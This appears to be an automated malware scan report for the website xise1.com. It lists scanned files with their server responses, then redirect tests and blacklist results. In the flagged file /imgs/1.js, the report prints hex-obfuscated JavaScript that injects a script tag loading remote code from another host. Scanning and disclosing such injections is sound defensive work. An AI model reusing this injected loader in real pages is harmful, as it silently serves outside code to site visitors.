Scanned pages/files
Request | Server response | Status |
http://www.xise1.com/ | 200 OK Content-Length: 43522 Content-Type: text/html | clean |
http://www.865210.com/head.js | 200 OK Content-Length: 619 Content-Type: application/x-javascript | clean |
http://www.xise1.com/imgs/t.js | 200 OK Content-Length: 2962 Content-Type: application/x-javascript | clean |
http://www.xise1.com/imgs/1.js | 200 OK Content-Length: 556 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x78\x68\x75\x6e\x69\x6f\x6e\x2e\x63\x6f\x6d\/\x70\x61\x67\x65\/\x3f\x73\x3d\x37\x38\x32\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
r = 2;var seed = Math.random(); rnd = Math.ceil(seed * r); switch (rnd) { case 1: document.write('<script src="/imgs/01.js"></script>'); break; case 2: document.write('<script src="/imgs/02.js"></script>'); break; } Antivirus reports:
| ||
http://www.xise1.com/imgs/2.js | 200 OK Content-Length: 118 Content-Type: application/x-javascript | clean |
http://s0.yeyequ.com/js/tg.js | 200 OK Content-Length: 1030 Content-Type: application/x-javascript | clean |
http://s5.cnzz.com/stat.php?id=5836980&web_id=5836980 | 200 OK Content-Length: 9618 Content-Type: application/javascript | clean |
http://s5.cnzz.com/stat.php?id=4842903&web_id=4842903 | 200 OK Content-Length: 9621 Content-Type: application/javascript | clean |
http://www.xise1.com/gg.html | HTTP/1.1 200 OK Date: Sat, 19 Apr 2014 05:46:12 GMT Accept-Ranges: bytes ETag: "60ea31c6255bcf1:0" Server: Microsoft-IIS/7.5 Content-Length: 3050 Content-Type: text/html Last-Modified: Fri, 18 Apr 2014 16:46:41 GMT | clean |
http://www.xise1.com/test404page.js | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 19 Apr 2014 05:46:15 GMT Location: http://www.xise1.com/test404page.js Server: Microsoft-IIS/7.5 Content-Length: 156 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSDTQRAD=FAHLBHHAIGLBCHPMKKOKFLPI; path=/ | clean |
http://www.xise1.com/tupian/toupai/index.html | 200 OK Content-Length: 27361 Content-Type: text/html | clean |
http://s0.yeyequ.com/js/lba.js | 200 OK Content-Length: 1296 Content-Type: application/x-javascript | clean |
http://www.xise1.com/tupian/yazhou/index.html | 200 OK Content-Length: 28245 Content-Type: text/html | clean |
http://www.xise1.com/tupian/siwa/index.html | 200 OK Content-Length: 27825 Content-Type: text/html | clean |
http://www.xise1.com/tupian/oumei/index.html | 200 OK Content-Length: 23792 Content-Type: text/html | clean |
http://www.xise1.com/tupian/mingxing/index.html | 200 OK Content-Length: 40405 Content-Type: text/html | clean |
http://www.xise1.com/tupian/qingchun/index.html | 200 OK Content-Length: 32853 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xise1.com
Result:
GET / HTTP/1.1
Host: xise1.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xise1.com
Referer: http://www.google.com/search?q=xise1.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xise1.com
Referer: http://www.google.com/search?q=xise1.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xise1.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xise1.com/
Result: xise1.com is not infected or malware details are not published yet.
Result: xise1.com is not infected or malware details are not published yet.